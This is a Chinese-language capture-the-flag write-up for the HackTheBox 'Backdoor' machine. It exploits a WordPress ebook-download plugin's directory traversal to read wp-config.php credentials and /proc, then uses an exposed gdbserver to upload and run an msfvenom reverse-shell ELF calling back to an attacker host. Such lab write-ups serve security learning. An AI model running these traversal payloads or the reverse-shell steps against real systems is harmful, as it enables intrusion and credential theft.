[HackTheBox] Backdoor – Easy – WP

机器信息

• 系统 Linux
• 难度 Easy

Easy难度中此机器算是比较难的 新手可以跳过

WP

信息收集

nmap扫描发现三个开放的TCP端口，SSH(22) 和HTTP(80) 以及一个1337未知服务端口

root@kali$ nmap -p 22,80,1337 -sCV -oA scans/nmap-tcpscripts 10.10.11.125
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-20 16:55 UTC
Nmap scan report for 10.10.11.125
Host is up (0.091s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_https-redirect: ERROR: Script execution failed (use -d to debug)
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds

通过nmap --script vuln漏洞扫描并未直接扫描到任何有效信息

根据OpenSSH和Apache版本，主机系统可能为 Ubuntu 20.04 focal。

TCP – 1337端口

nmap扫描得不到任何结果，尝试使用nc和curl发送请求均无果

root@kali$ nc -v 10.10.11.125 1337
Connection to 10.10.11.125 1337 port [tcp/*] succeeded!
hello
test
^C
root@kali$ curl 10.10.11.125:1337
^C

先跳过 后面再看

Web – 80端口

站点

该网站是一个博物馆门户，应该是一个模板

“Home” 链接指向backdoor.htb 随后添加到/etc/hosts解析并使用wfuzz暴破子域名，没有任何结果。

技术栈

通过whatweb识别，该网站采用WordPress

使用wpscan扫描

root@kali$ wpscan -e ap,t,tt,u --url http://backdoor.htb --api-token $WPSCAN_API
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|              

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://backdoor.htb/ [10.10.11.125]
...[snip]...

...[snip]...
[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
...[snip]...

没什么有效的结果

feroxbuster

feroxbuster我的神！

root@kali$ feroxbuster -u http://backdoor.htb/wp-content/plugins -w plugins.txt 

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.5.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://backdoor.htb/wp-content/plugins
 🚀  Threads               │ 50
 📖  Wordlist              │ plugins.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.5.0
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      277c http://backdoor.htb/wp-content/plugins/akismet
301      GET        9l       28w      340c http://backdoor.htb/wp-content/plugins/ebook-download => http://backdoor.htb/wp-content/plugins/ebook-download/
[####################] - 3m    160172/160172  0s      found:2       errors:1      
[####################] - 2m     80086/80086   508/s   http://backdoor.htb/wp-content/plugins 
[####################] - 2m     80086/80086   516/s   http://backdoor.htb/wp-content/plugins/ebook-download

发现了两个插件

可以看到这里有一个电子书下载插件，单击文件夹会显示包括readme.txt和版本和其余插件文件在内的内容

立足点

初始访问 – 获得Shell

搜索发现这个电子书插件有一个公开的ExpDB信息

PoC

我将先检查版本然后手工利用

root@kali$ curl http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
=== Plugin Name ===                               
Contributors: zedna                                                 
Donate link: https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=3ZVGZTC7ZPCH2&lc=CZ&item_name=Zedna%20Brickick%20Website&currency_code=USD&bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted
Tags: ebook, file, download                                         
Requires at least: 3.0.4         
Tested up to: 4.4                             
Stable tag: 1.1 
...[snip]...

从版本看，存在漏洞

我将手工利用这个目录遍历漏洞读取敏感信息

root@kali$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php
/**
 * The base configuration for WordPress
...[snip]...
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...[snip]...

尝试利用敏感信息登录 无果

枚举

通过wfuzz枚举目录 最终获得/etc/passwd

root@kali$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../etc/passwd
../../../../../../../etc/passwd../../../../../../../etc/passwd../../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...[snip]...
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
<script>window.close()</script>

尝试连接SSH无果

进程枚举

在1337端口上运行的未知服务我们暂时没有利用

如果我想查看系统运行的进程，我可以查看/proc

root@kali$ ls /proc/
1     109   12    130   1756  1820  1957  2070  2149  2194  224   2286  2431   28422  36    41     441  520    70500  766    786    79395  800    83982  913  97          cpuinfo        fs          kpagecgroup  mtrr          stat           version_signature
10    11    1203  131   1767  1825  1962  2075  2152  2197  2242  2291  2437   29     37    412    442  52570  70501  767    78741  79398  80168  84355  92   98          crypto         interrupts  kpagecount   net           swaps          vmallocinfo
100   111   1204  1336  1784  187   1964  2106  2154  22    225   23    2458   3      38    417    444  52571  70506  770    78742  79402  80173  84439  928  999         devices        iomem       kpageflags   pagetypeinfo  sys            vmstat
1002  112   1205  136   1786  19    1967  2110  2156  220   2254  2321  2478   30     386   41868  445  562    70507  772    78834  79567  80198  85154  93   acpi        diskstats      ioports     loadavg      partitions    sysrq-trigger  zoneinfo
102   113   1206  137   1797  190   1968  2114  2163  2208  2257  2335  25     31     39    42     447  5643   70508  774    78837  79627  802    85332  939  bootconfig  dma            irq         locks        pressure      sysvipc
1026  114   1207  14    18    191   1970  2116  2178  221   226   2343  2562   32     4     427    448  570    70509  775    790    79655  80214  85354  94   buddyinfo   driver         kallsyms    mdstat       schedstat     thread-self
1029  115   1208  15    1802  193   2     2123  2181  222   227   2353  2570   328    40    43     449  582    70510  78486  79065  79692  80228  85575  95   bus         dynamic_debug  kcore       meminfo      scsi          timer_list
104   116   1230  16    1803  1943  20    2135  2185  2223  228   2382  26     329    402   436    477  6      70511  78488  79069  79784  80458  85634  952  cgroups     execdomains    keys        misc         self          tty
105   117   127   160   1808  1945  2056  2142  2188  223   2284  2393  28     34     403   438    479  670    75954  78493  793    79870  80533  9      96   cmdline     fb             key-users   modules      slabinfo      uptime
107   1185  13    17    1809  1955  2061  2146  219   2234  2285  24    28408  35     4083  44     482  673    75979  785    79388  799    812    91     963  consoles    filesystems    kmsg        mounts       softirqs      version

还有self目录，它是当前进程PID的符号链接

root@kali$ ls -l /proc/self
lrwxrwxrwx 1 root root 0 Apr 18 21:38 /proc/self -> 85664

在每个编号文件中，cmdline文件都有记录命令行用户执行的过程

root@kali$ cat /proc/self/cmdline
cat/proc/self/cmdline

值得关注的是，cat和路径之间没有空格

root@kali$ cat /proc/self/cmdline | xxd
00000000: 6361 7400 2f70 726f 632f 7365 6c66 2f63  cat./proc/self/c
00000010: 6d64 6c69 6e65 00                        mdline.

后门PoC

在Backdoor上，我可以用同样的方法

root@kali$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/self/cmdline
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

为了将二进制数据放进curl 我使用-o-参数 并使用xxd查看结果

root@kali$ curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/self/cmdline -o- | xxd
00000000: 2e2e 2f2e 2e2f 2e2e 2f2e 2e2f 2e2e 2f2e  ../../../../../.
00000010: 2e2f 2e2e 2f70 726f 632f 7365 6c66 2f63  ./../proc/self/c
00000020: 6d64 6c69 6e65 2e2e 2f2e 2e2f 2e2e 2f2e  mdline../../../.
00000030: 2e2f 2e2e 2f2e 2e2f 2e2e 2f70 726f 632f  ./../../../proc/
00000040: 7365 6c66 2f63 6d64 6c69 6e65 2e2e 2f2e  self/cmdline../.
00000050: 2e2f 2e2e 2f2e 2e2f 2e2e 2f2e 2e2f 2e2e  ./../../../../..
00000060: 2f70 726f 632f 7365 6c66 2f63 6d64 6c69  /proc/self/cmdli
00000070: 6e65 2f75 7372 2f73 6269 6e2f 6170 6163  ne/usr/sbin/apac
00000080: 6865 3200 2d6b 0073 7461 7274 003c 7363  he2.-k.start.<sc
00000090: 7269 7074 3e77 696e 646f 772e 636c 6f73  ript>window.clos
000000a0: 6528 293c 2f73 6372 6970 743e            e()</script>

它好像会把输入的参数打印三遍，然后直接拼接在一起，输出的结果里有 \x00，我希望这些地方被替换成空格。

最后它的结尾是 <script>window.close()</script>。

我可以用 tr 命令把空字节换成空格，再用 cut 命令去掉开头和结尾的部分。

root@kali$ curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/self/cmdline | tr '\000' ' ' | cut -c115- | rev | cut -c32- | rev
/usr/sbin/apache2 -k start

分解如下：

• tr '\000' ' '用空格替换空值

• cut -c115-从字符115开始并打印其余部分

• rev | cut -c32- | rev反转字符串，从32个字符开始，然后再次反转，最终删除最后31个字符

编写Bash脚本

我可以编写一个Bash脚本循环遍历一系列PID，并尝试查找进程

#!/bin/bash

for i in $(seq 1 50000); do

    path="/proc/${i}/cmdline"
    skip_start=$(( 3 * ${#path} + 1))
    skip_end=32

    res=$(curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=${path}ne -o- | tr '\000' ' ')
    output=$(echo $res | cut -c ${skip_start}- | rev | cut -c ${skip_end}- | rev)
    if [[ -n "$output" ]]; then
        echo "${i}: ${output}"
    fi

done

这个脚本会像之前的方式一样抓取结果，并将 \x00 替换为空格，然后使用 cut 命令去掉开头和结尾，最后输出 PID 及其对应的命令行信息（如果存在）。

该脚本每分钟大约能扫描前 1000 个进程，很快就能发现 PID 851

root@kali$ ./brute_processes.sh  
1: /sbin/init auto automatic-ubiquity noprompt 
486: /lib/systemd/systemd-journald 
512: /lib/systemd/systemd-udevd 
529: /lib/systemd/systemd-networkd 
...[snip]...
826: /usr/sbin/cron -f 
829: /usr/sbin/CRON -f 
830: /usr/sbin/CRON -f 
851: /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done 
853: /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done 
865: /usr/sbin/atd -f 
867: sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
887: /usr/sbin/apache2 -k start 
898: /usr/lib/accountsservice/accounts-daemon 
...[snip]...

这个进程运行的是：

/bin/sh -c while true;
    do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; 
done

它作为user用户运行gdbserver，并循环监听1337端口。

利用gdbserver

上传反弹Shell ELF

Hacktricks上有一篇文章介绍了如何利用gdbserver进行漏洞利用。

从目标使用的1337 端口和/home/user目录来看，这种方法应该可以在 Backdoor 这个靶机上使用。

我们可以创建一个ELF反弹shell并上传到远程调试器执行：

root@kali$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 PrependFork=true -f elf -o rev.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: rev.elf

本地调试

为了稳定，在上传之前，我们可以先本地测试：

root@kali$ gdb -q rev.elf 
Reading symbols from rev.elf...
(No debugging symbols found in rev.elf)
(gdb)

然后连接远程服务器：

(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2

上传ELF二进制文件：

(gdb) remote put rev.elf /dev/shm/rev
Successfully sent file "rev.elf".

然后将远程调试目标设置为该文件，并运行：

(gdb) set remote exec-file /dev/shm/rev
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:  
Reading /dev/shm/rev from remote target...
Reading /dev/shm/rev from remote target...
Reading symbols from target:/dev/shm/rev...
(No debugging symbols found in target:/dev/shm/rev)
[Detaching after fork from child process 33603]
[Inferior 1 (process 33592) exited normally]

获得Shell：

root@kali$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.125 46586
id
uid=1000(user) gid=1000(user) groups=1000(user)

 

权限提升

我会放到下一篇文章讲解